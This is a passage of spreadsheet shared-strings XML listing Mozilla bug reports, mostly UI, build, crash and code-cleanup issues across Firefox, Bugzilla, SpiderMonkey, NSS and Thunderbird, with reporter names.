  </si>
  <si>
    <t>BUGZILLA-505038</t>
  </si>
  <si>
    <t>Use $user-&gt;is_insider instead of $user-&gt;in_group(Bugzilla-&gt;params-&gt;{'insidergroup'})</t>
  </si>
  <si>
    <t>Bugzilla-&gt;params-&gt;{'insidergroup'}
  &amp;&amp; $user-&gt;in_group(Bugzilla-&gt;params-&gt;{'insidergroup'})
should be replaced by $user-&gt;is_insider. That's shorter cleaner and less prone to errors. We should fix all places in the Bugzilla code which still doesn't use it yet.</t>
  </si>
  <si>
    <t>CORE-420593</t>
  </si>
  <si>
    <t>fixing bad English in jsgc.c comments</t>
  </si>
  <si>
    <t>From bug 396007 comment 30 by timeless:
(In reply to comment #18)
&gt; (From update of attachment 304758 [details] [details])
&gt; &gt;+ * When it is is true a platform-dependant function like mmap is used to get
it is true dependent. I'm shocked that brendan didn't complain.</t>
  </si>
  <si>
    <t>CORE-175787</t>
  </si>
  <si>
    <t>Resize large images to fit in treeview instead of cropping</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.2b) Gecko/20021020 Phoenix/0.3
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.2b) Gecko/20021020 Phoenix/0.3
Favicons are displayed next to the bookmarks in the bookmark sidebar. However
large favicons such as the one used at http://www.trolltech.com/ won't be
resized to fit the allocated space but gets cropped instead.
The favicon does look good in the location field and on the tabs though!
Reproducible: Always
Steps to Reproduce:
1. Go to http://www.trolltech.com/
2. Make a bookmark to the page.
3. Open the bookmarks sidebar and observe the upper left quarter of the QT logo.
Actual Results:  
I observed the upper left quarter of the QT logo :-)
Expected Results:  
Display the entire logo.</t>
  </si>
  <si>
    <t>takeshi2</t>
  </si>
  <si>
    <t>micke</t>
  </si>
  <si>
    <t>SEAMONKEY-51688</t>
  </si>
  <si>
    <t>Use Stylesheet menu: differentiate None from disabling all styles</t>
  </si>
  <si>
    <t>Hi this is with 2000-09-06-21/Linux and a strip off from a bug reported in 6782.
The menu item View|Use stylesheet|None should be changed in order to reflect
that None doesn't disable the stylesheets totally but only those that are in
a external file.
Suggested menu entry Minimal Page Style</t>
  </si>
  <si>
    <t>CORE-244876</t>
  </si>
  <si>
    <t>Remove 2 unnecessary memsets in nsTextFrame.cpp</t>
  </si>
  <si>
    <t>See:
http://groups.google.nl/groups?hl=nl&amp;lr=&amp;ie=UTF-8&amp;frame=right&amp;th=55c27fe62dd23160&amp;seekm=c94ut5%24bn31%40ripley.netscape.com#link1
Remove these 2 memset in nsTextFrame.cpp since they seem do nothing usefull.
http://lxr.mozilla.org/mozilla/source/layout/html/base/src/nsTextFrame.cpp#164
http://lxr.mozilla.org/mozilla/source/layout/html/base/src/nsTextFrame.cpp#187
I'll try to make a patch once my fresh build is done.</t>
  </si>
  <si>
    <t>rp.moz</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-430037</t>
  </si>
  <si>
    <t>[Firefox-Hilfe 3.0] Options window</t>
  </si>
  <si>
    <t>Diff in der URL bitte hier kommentieren wer den Bug Ã¼bernehmen mÃ¶chte.</t>
  </si>
  <si>
    <t>CORE-501230</t>
  </si>
  <si>
    <t>TM: fast path for String.toString</t>
  </si>
  <si>
    <t>NSS-180894</t>
  </si>
  <si>
    <t>ShutdownCRLCache() PR_Asserts in cases when it shouldn't have been called</t>
  </si>
  <si>
    <t>same string of issues as before there is no profile dir the initializations
all failed ealier NSS doesn't need to shoot a user at the end of a session at
worst it should fail silently at best it shouldn't be called at all.
NTDLL! 77f9f9df()
ShutdownCRLCache() line 1038 + 32 bytes
NSS_Shutdown() line 546
nsNSSComponent::ShutdownNSS() line 1091
nsNSSComponent::~nsNSSComponent() line 255
nsNSSComponent::`scalar deleting destructor'() + 15 bytes
nsNSSComponent::Release(nsNSSComponent * const 0x04e802c8) line 1150 + 151 bytes
nsSupportsArray::Clear(nsSupportsArray * const 0x01073f08) line 560 + 54 bytes
nsSupportsArray::DeleteArray() line 305
nsSupportsArray::~nsSupportsArray() line 148
nsSupportsArray::`vector deleting destructor'(unsigned int 1) + 81 bytes
nsSupportsArray::Release(nsSupportsArray * const 0x01073f08) line 239 + 148 bytes
nsCOMPtr::~nsCOMPtr() line 491
nsObserverList::~nsObserverList() line 58 + 11 bytes
nsObserverList::`scalar deleting destructor'(unsigned int 1) + 15 bytes
ReleaseObserverList(nsHashKey * 0x01073ec0 void * 0x01039468 void *
0x00000000) line 109 + 28 bytes
hashEnumerateRemove(PLDHashTable * 0x0027ca30 PLDHashEntryHdr * 0x010359ac
unsigned int 23 void * 0x0012fdd8) line 315 + 26 bytes
PL_DHashTableEnumerate(PLDHashTable * 0x0027ca30 int (PLDHashTable *
PLDHashEntryHdr * unsigned int void *)* 0x100204d0
hashEnumerateRemove(PLDHashTable * PLDHashEntryHdr * unsigned int void *)
void * 0x0012fdd8) line 603 + 34 bytes
nsHashtable::Reset(int (nsHashKey * void * void *)* 0x1001b160
ReleaseObserverList(nsHashKey * void * void *) void * 0x00000000) line 336 +
21 bytes
nsObjectHashtable::Reset() line 875
nsObjectHashtable::~nsObjectHashtable() line 834
nsObjectHashtable::`vector deleting destructor'(unsigned int 1) + 81 bytes
nsObserverService::~nsObserverService() line 84 + 33 bytes
nsObserverService::`scalar deleting destructor'(unsigned int 1) + 15 bytes
nsObserverService::Release(nsObserverService * const 0x00fc6e48) line 72 + 142 bytes
nsCOMPtr_base::assign_assuming_AddRef(nsISupports * 0x00000000) line 436
nsCOMPtr_base::assign_with_AddRef(nsISupports * 0x00000000) line 74
nsCOMPtr::operator=(nsISupports * 0x00000000) line 796
FreeServiceContractIDEntryEnumerate(PLDHashTable * 0x0027d7ac PLDHashEntryHdr *
0x00febb64 unsigned int 847 void * 0x00000000) line 1926
PL_DHashTableEnumerate(PLDHashTable * 0x0027d7ac int (PLDHashTable *
PLDHashEntryHdr * unsigned int void *)* 0x1006b1f0
FreeServiceContractIDEntryEnumerate(PLDHashTable * PLDHashEntryHdr * unsigned
int void *) void * 0x00000000) line 603 + 34 bytes
nsComponentManagerImpl::FreeServices() line 1938 + 19 bytes
NS_ShutdownXPCOM(nsIServiceManager * 0x00000000) line 723
main(int 1 char * * 0x002847a0) line 1911 + 8 bytes
mainCRTStartup() line 338 + 17 bytes
KERNEL32! 77e87903()</t>
  </si>
  <si>
    <t>CORE-284434</t>
  </si>
  <si>
    <t>Browser crashes while printing page [@ nsBlockFrame::SplitPlaceholder ]</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U AIX 000F2B4C4C00 en-US rv:1.8a6) Gecko/20050301
Build Identifier: Mozilla/5.0 (X11 U AIX 000F2B4C4C00 en-US rv:1.8a6) Gecko/20050301
This page fails HTML validation... and... crashing is a bit harsh.
Reproducible: Always
Steps to Reproduce:
1. Click http://drupal.org/node/15689
2. Select print
3. About halfway through crash occurs</t>
  </si>
  <si>
    <t>THUNDERBIRD-372671</t>
  </si>
  <si>
    <t>Restore default doesn't restore the default start page</t>
  </si>
  <si>
    <t>The Restore default button in Preferences &gt; General doesn't restore the default home page anymore.
Steps to reproduce:
1) Tools&gt;Optons or Edit/Thunderbird &gt; Preferences
2) Enter www.google.com as the start page URL
3) Click Restore default
Actual results:
1) I still see Google...
Expected results:
1) I want to see the default Tb start page
Tb build ID: 2.0pre (20070304)
This bug is related to (or even may be a regresion from) bug 370537</t>
  </si>
  <si>
    <t>BUGZILLA-103664</t>
  </si>
  <si>
    <t>Clean up tests to use 'use strict' and TEST_VERBOSE</t>
  </si>
  <si>
    <t>The soon-to-be-attached patch will do the following:
1. Change use 'VERBOSE' environment variable when running tests to use
   'TEST_VERBOSE' instead.  This is what ExtUtils::MakeMaker uses when
   generating a Makefile from Makefile.PL.  The runtests.sh script and
   the test scripts should do the same.
2. Add 'use strict' to all test scripts and clean up undeclared
   variables.
3. Add $verbose variable to t/002goodperl.t in case it is needed later.
4. Remove sillyness from t/001compile.t for $warnings variable
   (which really should have been %warnings).
5. Clean up package name of t/Support/Systemexec.pm from 'Systemexec'
   to 'Support::Systemexec' and fix t/003safesys.t to use the proper
   syntax for the module.
6. Fix regex in t/003safesys.t when testing for error messages from 
   improper exec() calls.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-306764</t>
  </si>
  <si>
    <t>Revise the custom control interface for XForms</t>
  </si>
  <si>
    <t>There are some cross-platform/processor problems with the interface we currently
have for Custom Constrols:
interface nsIXFormsDelegate : nsISupports
{
  attribute DOMString value
  readonly attribute boolean isReadonly
  readonly attribute boolean isEnabled
  readonly attribute boolean isRequired
  readonly attribute boolean isValid
  readonly attribute boolean hasBoundNode
  void widgetAttached()
}
1. Name clashes
We could quite easily get name clashes with existing attributes depending on
what element the current interface is exposed on. If somebody extends an already
existing input control there is a good chance that .value already exists. The
could also apply to f.x. isReadonly.
2. Using attributes
If somebody wants to implement the controls in pure javascript I've been told
that some browsers do not let you watch attribute changes so it would not be
possibly to implement .value.
To fix problem 2) we need to only use functions. To fix problem 1) I have two
possible solutions:
A) Use a context object like canvas does. That is have one
.getXFormsAccessors() function that returns a new object where the above
interface is implemented.
B) Prefix every function with f.x. form. So we would have .formIsReadonly().
I like A) best but the problem is that when I tried to implement it I hit some
security error with XBL when I tried to return the object :(</t>
  </si>
  <si>
    <t>JSS-465850</t>
  </si>
  <si>
    <t>Expose the TLS session ticket extension (STE)</t>
  </si>
  <si>
    <t>the TLS session ticket extension (STE) was added to NSS by bug 403563</t>
  </si>
  <si>
    <t>CORE-476374</t>
  </si>
  <si>
    <t>JSON.parse does not support reviver argument as defined in spec</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 de rv:1.9.1b2) Gecko/20081201 Firefox/3.1b2 Ubiquity/0.1.5
Build Identifier: Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 de rv:1.9.1b2) Gecko/20081201 Firefox/3.1b2 Ubiquity/0.1.5
The spec for the JSON.parse function as defined in
http://wiki.ecmascript.org/doku.php?id=es3.1:json_support
as linked from https://developer.mozilla.org/en/JSON#JSON.c2.a0in_Firefox_3.1
provides for a second parameter that allows modifying the result of the parsing.
This feature is also implemented by the immensely popular json2.js file from json.org that is the reference implementation for the spec.
Reproducible: Always
Steps to Reproduce:
Execute this piece of JavaScript in FF 3.1
var f = function (key value) { if(key == a) return b else return value }
alert(JSON.parse('{ a:c }' f).a)
Actual Results:  
It alerted c
Expected Results:  
It should have alerted b.
When executing this code in a browser without native JSON support but with loaded json2.js the result is as expected.
Executing the code in IE 8 beta (which also has native JSON support) yields the correct result.</t>
  </si>
  <si>
    <t>malte.ubl</t>
  </si>
  <si>
    <t>CORE-242888</t>
  </si>
  <si>
    <t>libnegotiate.so not packaged for installer on 1.7 branch</t>
  </si>
  <si>
    <t>The installer builds on the 1.7 branch don't install libnegotiate.so but the
non-installer builds include it.
Patch coming up.</t>
  </si>
  <si>
    <t>cneberg</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-105881</t>
  </si>
  <si>
    <t>`Edit' menu is missing in Chatzilla</t>
  </si>
  <si>
    <t>Build: 2001101904 Mac OS 9.1
To reproduce:
1.  Open a Chatzilla window.
2.  Select some text.
3.  Try to copy it with the mouse.
What should happen:
*   You can.
What actually happens:
*   You can't.
What was expected:
*   There should be an `Edit' menu with `Undo' `Redo' `Cut' `Copy' `Paste'
    `Delete' and `Select All' items.</t>
  </si>
  <si>
    <t>TOOLKIT-349437</t>
  </si>
  <si>
    <t>Menulist menuitem font doesn't inherit from the parent anymore</t>
  </si>
  <si>
    <t>Bug 344570 introduced the font -moz-pull-down-menu in menulist menuitems. This looks nice if the parent font is set to menu (like Firefox pref window).
But you can't use a smaller font in the parent anymore - the default menulist item will then be of a small font and the menuitem labels will have the large -moz-pull-down-menu font.</t>
  </si>
  <si>
    <t>CORE-521163</t>
  </si>
  <si>
    <t>Assertion failure: OBJ_GET_CLASS(cx obj) != &amp;js_BlockClass at ../jsobj.cpp with defineGetter eval</t>
  </si>
  <si>
    <t>for (c in [0]) {
    let(c = __defineGetter__( function(){})) {
        eval(function w(){})++
    }
}
asserts js debug shell on TM tip at Assertion failure: OBJ_GET_CLASS(cx obj) != &amp;js_BlockClass at ../jsobj.cpp:4559 without -j.
autoBisecting soon...</t>
  </si>
  <si>
    <t>SEAMONKEY-56150</t>
  </si>
  <si>
    <t>New Colorpicker buttons should take focus</t>
  </si>
  <si>
    <t>Build ID: new trunk and branch builds
The new colorpicker buttons should take focus just like any other button so 
that (eventually) the colorpicker can be accessible via the keyboard.  Joe 
would this be yours?
Don't know what component I should throw this in...Doron don't you love me?</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-230361</t>
  </si>
  <si>
    <t>inDOMView leaks atoms (one-time leak)</t>
  </si>
  <si>
    <t>inDOMView leaks atoms (it's a one-time leak since it's the same atoms although
the refcounts keep going up).  But to clear up the leak stats I'll attach a
patch that makes it use nsStaticAtoms and hopefully thus reduces codesize as well.</t>
  </si>
  <si>
    <t>BUGZILLA-314548</t>
  </si>
  <si>
    <t>Error : document.refresh is not a function appears in the JS console when (un)checking the Private checkbox in show_bug.cgi</t>
  </si>
  <si>
    <t>this is a regression due to bug 310171. Appears on both Firefox and IE.</t>
  </si>
  <si>
    <t>CORE-26767</t>
  </si>
  <si>
    <t>need support RFC2640 (Internationalization of the File Transfer Protocol)</t>
  </si>
  <si>
    <t>Current implementation of filename encoding via FTP etc depends on OS.
But by RFC2640 filename should use UTF8 via FTP.  So we should support RFC2640.</t>
  </si>
  <si>
    <t>VYV03354</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-393355</t>
  </si>
  <si>
    <t>make accessibilityEvents view to filter events</t>
  </si>
  <si>
    <t>accessibilityEvents view should have an ability to filter events by type (see nsIAccessibleEvent for possible types).</t>
  </si>
  <si>
    <t>BUGZILLA-166755</t>
  </si>
  <si>
    <t>checksetup.pl gives inadequate error message for administrator password prompt</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/4.0 (compatible MSIE 5.14 Mac_PowerPC)
Build Identifier: irrelevant
checksetup.pl's error message for the administrator password prompt
does not explain why it is rejecting a non-zero-length password.
Reproducible: Always
Steps to Reproduce:
1.Perform initial install of bugzilla
2.Run checksetup.pl
3.At administrator password prompt enter for example a string
containing a period space or special character
Actual Results:  
Endless loop of
The password must be 3-16 characters in length.
Followed by frustrated read of perl code to determine problem.
Expected Results:  
Given the error message proposed in the diff below or accepted
a more complex set of characters.
Here is a proposed solution presented as a diff:
% diff bugzilla-2.16/checksetup.pl revised-checksetup.pl
1993c1993
&lt;           print The password must be 3-16 characters in length.
---
&gt;           print The password must be 3-16 characters in length using only 
upper/lowercase alpha digits or underscore (_).</t>
  </si>
  <si>
    <t>gfowler</t>
  </si>
  <si>
    <t>TOOLKIT-338155</t>
  </si>
  <si>
    <t>Upgrade to sqlite 3.3.5</t>
  </si>
  <si>
    <t>SEAMONKEY-91113</t>
  </si>
  <si>
    <t>java plugin install broken for Windows ME</t>
  </si>
  <si>
    <t>I do most of my e-commerce buying with IE on Windows ME.  I decided to try and
purchase a weedwacker repair part today using Mozilla 0.9.2 on Windows ME.
I browsed www3.sears.com (their parts direct web page) and entered 358799260 as
the model number of the weed wacker.  An intermediate web page was presented
that showed this was a Craftsman Weedwacker and gave me the opportunity to
confirm by clicking Continue which I did.  On the next web page I clicked the
radio button that allowed me to view a diagram of the weedwacker's drive shaft
and cutter head.
A popup window was displayed with the message:  Click here to get plugin 
So I clicked as directed to start installing the Java 2 plugin for Windows.
The installation ran to completion.  Afterward I once again tried to view the
diagram of the weedwacker's drive shaft and cutter head.  I was once again
prompted to click here to get plugin.  I exited Mozilla and restarted the
browser at which point I received an audible bell and an error message about
needing to restart to allow something to complete installation.  So I rebooted
my computer and restarted Mozilla--no error now.  I revisited www3.sears.com and
tried once more to view the drive shaft and cutter head.  I was once again
prompted to click here to get plugin.  Well obviously the install didn't work.
I viewed the installed Mozilla Plugins (Help -&gt; About Plugins) and noticed that
Mozilla did _not_ list a Java plugin.
However if I open the Windows ME control panel and invoke the Add/Remove
Programs applet I see Java 2 Runtime Environment Standard Edition v1.3.0._01
listed as an installed app.
It appears to me that the Java Plugin installation is not working for Mozilla
0.9.2 .</t>
  </si>
  <si>
    <t>cmorgan</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-253584</t>
  </si>
  <si>
    <t>[german help] Translate composer_help.xhtml</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.8a3) Gecko/20040728 Mnenhy/0.6.0.104
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.8a3) Gecko/20040728 Mnenhy/0.6.0.104
html -&gt; xhtml sowie aktualisierte help-toc.rdf
Bis Sonntag kann ich composer_help.xhtml hinkriegen
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>BUGZILLA-322212</t>
  </si>
  <si>
    <t>DERIVE_GROUPS_TABLES_ALREADY_LOCKED is ignored on 2.20+ when creating a new user object</t>
  </si>
  <si>
    <t>This is a regression from my patch for bug 319082 and only affects 2.20+ (the patch landed on Dec 18 2005).
On tip DERIVE_GROUPS_TABLES_ALREADY_LOCKED has been removed and so considering the user ID only is fine. But on 2.20 this constant still exists and Bugzilla::User-&gt;new() still has to take two arguments (user ID + DERIVE_GROUPS_TABLES_ALREADY_LOCKED).</t>
  </si>
  <si>
    <t>CORE-290920</t>
  </si>
  <si>
    <t>If an element has 'font-variant: small-caps' the selection color is broken</t>
  </si>
  <si>
    <t>See https://bugzilla.mozilla.org/attachment.cgi?id=180877 and select the text.
If you select the two or more words the selection color is broken.</t>
  </si>
  <si>
    <t>DIRECTORY-372858</t>
  </si>
  <si>
    <t>ldap tools build without svrcore is broken.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8.1.2) Gecko/20070219 Firefox/2.0.0.2
Build Identifier: 
when building without SVRCORE component ldap client tools build fails with:
common.c: In function `ldaptool_process_args':
common.c:667: error: `ssl_donglefile' undeclared (first use in this
function)
common.c:667: error: (Each undeclared identifier is reported only once
common.c:667: error: for each function it appears in.)
Reproducible: Always
Steps to Reproduce:
1.
2.
3.
Expected Results:  
should be able to build without SVRCORE component.</t>
  </si>
  <si>
    <t>neuroc0der</t>
  </si>
  <si>
    <t>CORE-481753</t>
  </si>
  <si>
    <t>Another potential imgRequest-not-in-cache bug</t>
  </si>
  <si>
    <t>After bug 481553 didn't solve the crash in mozilla-central I went back to the source code with the ideas I found in that bug and found another. This is a race condition. 
1. Load an image normally.
2. Browsing happens and there are no more proxies for this image cache entry. The image cache entry starts being tracked for removal.
3. The image is re-requested and gets set up with its imgCacheEntry again but *does not get removed from the time-based expiry notice.* Imagelib needs to go out to the network to validate the cache entry.
4. Enough time passes and the image cache entry is removed from the cache by the nsExpiryTracker.
5. The validation results finally come back and the image needs to be re-loaded. The old image gets removed from the cache -- but wait! it's already removed!
Step 5 is a bit iffy since the only stacks I've ever seen for bug 480352 involve Cancel(). I'd expect a mix between Cancel() and the explicit RemoveFromCache in imgCacheValidator unless it's really unusual for images to need to be re-loaded when they're being validated.
I have no idea how to test this in a repeatable way.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-203939</t>
  </si>
  <si>
    <t>w3.org - HTML served as text/plain</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.4b) Gecko/20030429 Mozilla Firebird/0.6
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.4b) Gecko/20030429 Mozilla Firebird/0.6
Source code only displayed due to wrong mime type.
Reproducible: Always
Steps to Reproduce:
I wrote an email to the page author listed and let them know f the problem.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-664843</t>
  </si>
  <si>
    <t>syslog stopped working at 12:11 today</t>
  </si>
  <si>
    <t>We have nothing in our logs later than Jun 16 12:11:32 (PDT).
I see this on amo and preview.amo and I heard that builder.amo is affected too.</t>
  </si>
  <si>
    <t>jdow</t>
  </si>
  <si>
    <t>DEVTOOLS-926540</t>
  </si>
  <si>
    <t>WebIDE</t>
  </si>
  <si>
    <t>JavaScript error: chrome://desktop-helper.js/content/touch-events.js line 167: NotSupportedError: Operation is not supported</t>
  </si>
  <si>
    <t>lgreco</t>
  </si>
  <si>
    <t>BUGZILLA-142890</t>
  </si>
  <si>
    <t>make banner html a separate template</t>
  </si>
  <si>
    <t>It's good to chop up templates into smaller bites so installations can customize
them with minimal forking and CVS conflict.  The template formerly known as the
bannerhtml parameter is now part of header.html.tmpl even though it's a good
candidate for customization (installations that do nothing else are likely to
remove this explicit reference to mozilla.org).  That code should be broken out
into a separate template.</t>
  </si>
  <si>
    <t>CORE-381843</t>
  </si>
  <si>
    <t>Move for-var-in and for-let-in hoisting from the emitter to the parser</t>
  </si>
  <si>
    <t>Due to ES1 sloppy grammar production reuse these loops:
  for (var x = i in o) ...
  for (let x = i in o) ...
hoist as follows (assuming i is useful in the let case):
  (var x = i for (x in o) ...)
  (i for (let x in o) ...)
where the parenthesization means that the rewriting does not make a block but does make a group of sequential statements in the AST.
It's just wrong for the emitter to do this it grossly overcomplicates code generation. Fixing this will simplify the patch for bug 371802.
/be</t>
  </si>
  <si>
    <t>SEAMONKEY-144992</t>
  </si>
  <si>
    <t>[FIX] BookmarksUtils.cloneFolder does not clone subfolders (hordes of separators created in bookmarks)</t>
  </si>
  <si>
    <t>This bug is related to bug 142986.
It was present in older versions of Mozilla dissappeared then reappeared when
bug 142986 was solved. That is it exists with RC2 2002051008 but not older
2002050706 build.
If a folder of bookmarks is copied and pasted somewhere else in all the
arborescence of the folder (copy and/or original arborescence) bunches of
separators will be added at the end of the subfolders that originally contained
separators.
I created an attachement in bug 142986 that I'll repost here later. I also gave
there an extreme example: After a few hours of use of Mozilla a folder that
originally had 3 subfolders 11 bookmarks and 2 separators had 510 supplementary
separators at the end.
Only folders that had separators before the copy paste action will present this
issue. This leads to the quick and dirty workaround : delete all you separators
and this bug won't hit you.
Please note that this bug is strongly related to bug 142986 (copy cut and paste
of bookmarks FOLDERS). Everytime one has been solved the other has reappeared
so please test both for eventual effect of a patch.</t>
  </si>
  <si>
    <t>CORE-56228</t>
  </si>
  <si>
    <t>only first part of link gets :focus and :active ( containing )</t>
  </si>
  <si>
    <t>If there is a  inside an  then when any part of the  is clicked 
only the part above the  gets the :active style (red dotted border).
Note: I think using  (or ) inside  is bogus html.</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-266217</t>
  </si>
  <si>
    <t>Updated Firefox Extension: SyncMarks</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 rv:1.7.3) Gecko/20041001 Firefox/0.10.1
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 rv:1.7.3) Gecko/20041001 Firefox/0.10.1
This is a new extension that supports synchronizing your bookmarks to a variety
of targets.
link: http://www.heddway.com/firefox/syncmarks/syncmarks.xpi
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>mozdev</t>
  </si>
  <si>
    <t>SEAMONKEY-114687</t>
  </si>
  <si>
    <t>Active Accessibility: Bounds calculation off by how far we're scrolled into the document</t>
  </si>
  <si>
    <t>If the user has scrolled down 60 pixels every accessible object reports bounds
that are off by 60 pixels.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-449566</t>
  </si>
  <si>
    <t>Widget: Qt</t>
  </si>
  <si>
    <t>cairo-qpainter-surface.cpp fails to compile with gcc 4.3.x</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (compatible Konqueror/3.5 en_US) KHTML/3.5.9 (like Gecko)
Build Identifier: Last hg changeset: 16538:1f6895511812
cairo-qpainter-surface.cpp uses std::auto_ptr but doesn't #include  causing the compiler to complain about std::auto_ptr not existing.
Reproducible: Always
Steps to Reproduce:
Install gcc 4.3.x or later compile mozilla-qt
Actual Results:  
Build barfs
Expected Results:  
It compiles</t>
  </si>
  <si>
    <t>CORE-107756</t>
  </si>
  <si>
    <t>[ps] RFE: print option to output in Postscript Level 2.</t>
  </si>
  <si>
    <t>Mozilla needs a print option to output in Postscript Level 2. This would help
with some of the PS issue currently out there (i.e. transparent GIFs). Also the
output file is smaller when using Level 2 (I think).</t>
  </si>
  <si>
    <t>MichaelWright9</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-436119</t>
  </si>
  <si>
    <t>Jason Orendorff's Mac wireless keyboard isn't working</t>
  </si>
  <si>
    <t>I turned it off one night and the following morning when I turned it on it didn't work.  The green LED on the bottom doesn't light up no matter what I do.  I tried turning it off tapping some keys waiting turning it on tapping some keys then replacing the batteries and doing all that stuff again.  It seems to be dead.</t>
  </si>
  <si>
    <t>CORE-328296</t>
  </si>
  <si>
    <t>Obscured outlines are drawn (through things that are on top and not transparent)</t>
  </si>
  <si>
    <t>Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a1) Gecko/20060219 Firefox/1.6a1
I first noticed this on Tinderbox: after clicking a star to see a DHTML popup message I noticed that the star's outline was displayed on top of the message.
I think this a regression from the Frame Display Lists patch (bug 317375).</t>
  </si>
  <si>
    <t>CORE-367416</t>
  </si>
  <si>
    <t>Thebes API additions needed for SVG thebefication</t>
  </si>
  <si>
    <t>Created attachment 251965
thebes api additions/correction
Working on converting nsSVGPathGeometryFrame found a few missing things in the API (hit testing obtaining extents checking if a matrix is invertible).  Also found a bug in gfxRect gfxContext::UserToDevice(const gfxRect&amp; rect).</t>
  </si>
  <si>
    <t>FIREFOX_FOR_ANDROID_GRAVEYARD-487025</t>
  </si>
  <si>
    <t>Add Hungarian locale to Fennec</t>
  </si>
  <si>
    <t>Hungarian files have been added to hg already.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-461252</t>
  </si>
  <si>
    <t>First filter in Message Filters should be selected</t>
  </si>
  <si>
    <t>When you open up the the Message Filters window the first filter in the list gets the focus but it is not selected.  This makes various buttons and other UI elements disabled until you click on a filter.  It's visually unappealing and a little jarring when you do select a filter and all the UI elements become enabled.  Also the focus but no selection is a weird state that you can't get back in to because from then on there is always just one filter selected.
It would be better to just always select that first filter.</t>
  </si>
  <si>
    <t>TOOLKIT-258737</t>
  </si>
  <si>
    <t>Upgraded Extension does not overlay UI</t>
  </si>
  <si>
    <t>Steps to reproduce:
1) set app.extensions.version to 0.9
2) install Magpie 3.11 from http://www.bengoodger.com/software/tabloader/
3) restart note Magpie Tools submenu under Tools menu
4) reset app.extensions.version
5) set extensions.lastAppVersion to 0.9
6) close Firefox
7) set /compatibility.ini's build id field to something different
8) start Firefox
9) dismiss the update checker (Don't Check)
10) install Magpie 3.1.2 from http://www.bengoodger.com/software/tabloader/
11) restart firefox
12) no menu items!
Magpie was disabled by the checkformismatches process and when it was upgraded
the EM disabling flags were cleared but EM never told the chrome registry on
upgrade that it should allow overlays again.</t>
  </si>
  <si>
    <t>MARKETING-268281</t>
  </si>
  <si>
    <t>Trademark Permissions</t>
  </si>
  <si>
    <t>Firefoxcd</t>
  </si>
  <si>
    <t>Just requesting permission to use Firefoxcd.com and all of the incuded logo's 
trademarks ETC.</t>
  </si>
  <si>
    <t>cbeard</t>
  </si>
  <si>
    <t>dlichterman</t>
  </si>
  <si>
    <t>CORE-524867</t>
  </si>
  <si>
    <t>hoist js_AllocStack out of inner String.replace loop</t>
  </si>
  <si>
    <t>Created attachment 408752
v.1
With an operation like:
  abababababab.replace(/a/g function(){return 'B'})
we currently call js_AllocStack/js_FreeStack before/after each js_Invoke of the lambda argument.  Like kindred functions in jsarray.cpp we can do this once for the whole str_replace operation.  This patch does just that for a 10.9% speedup (8.1ms) on string-unpack-code.
The correctness of the patch relies on the fact that the number of arguments to each js_Invoke invocation is the same.  This follows from (1) that JSRegExp::parenCount is a constant value for a given JSRegExp and (2) the regexp used in a single str_replace invocation is fixed (cannot be changed by user code).</t>
  </si>
  <si>
    <t>RHINO_GRAVEYARD-217257</t>
  </si>
  <si>
    <t>decodeURIComponent() produces wrong result</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.3) Gecko/20030312
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.3) Gecko/20030312
Under Rhino 1.5R4.1 decodeURIComponent() overwrites everything before the first
'%' in its result.
Reproducible: Always
Steps to Reproduce:
1. java Shell
2. js&gt;var u = http%3a%2f%2fmozilla%2ffoo.html decodeURIComponent(u)
Actual Results:  
://mozilla/foo.html
Expected Results:  
http://mozilla/foo.html
I have fixed this bug on my system.  The problem is in
org.mozilla.javascript.NativeGlobal.decode(Context String boolean).  Here is a
code snippet:
                if (buf == null) {
                    // decode always compress so result can not be bigger then
                    // str.length()
                    buf = new char[length]
                    str.getChars(0 k buf 0)
                    bufTop = k // &lt;- I added this line ***
                }</t>
  </si>
  <si>
    <t>lmb</t>
  </si>
  <si>
    <t>CORE-207481</t>
  </si>
  <si>
    <t>[FIX]id attribute outside a form overrides</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.4a) Gecko/20030401
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.4a) Gecko/20030401
an image with id=reset outside a form overrides the reset() function in the
Javascript representation of the form-element.
Reproducible: Always
Steps to Reproduce:
1. load testcase strict.html or transitional.html
2. enter text
3. click on Reset me
Actual Results:  
entered text is still there
Expected Results:  
